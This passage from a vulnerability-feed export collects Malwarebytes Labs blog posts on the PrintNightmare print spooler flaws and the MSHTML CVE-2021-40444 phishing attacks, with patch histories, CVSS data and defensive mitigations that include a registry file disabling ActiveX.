[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July&#x27;s Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don&#x27;t print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk to attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H1, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803 which is not available yet\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1 Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that disallows users who are not administrators to install only signed print drivers to a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. The updates, patches, and some of the workarounds are all designed to limit the possible executables since they need to be signed printer drivers.\n\nFor a detailed and insightful diagram that shows GPO settings and registry keys administrators can check whether their systems are vulnerable, have a look at this flow chart diagram, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere&#x27;s a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn&#x27;t matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nIt is worth mentioning for the users that applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>) that according to 0patch it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft patches that only fix the RCE part of the vulnerability disable the 0patch micropatch which fixes both the LPE and RCE parts of the vulnerability.\n\n> If you&#x27;re using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn&#x27;t fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. <https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release a researcher has found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo Delpy shows that the update fails to fix vulnerable systems that use certain settings for a feature called [point and print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft&#x27;s defense the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency\u2019s (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. \n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he&#x27;d found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn&#x27;t seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn&#x27;t work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next patch Tuesday (July 12), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account can not place a new DLL in them.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can also configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft&#x27;s PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country&#x27;s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia&#x27;s largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn&#x27;t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it&#x27;s most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft&#x27;s mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select &quot;Export&quot;. Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You&#x27;ll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the &#x27;Enable Editing&#x27; buttons. Sadly, experience has learned us that it is not a good idea to 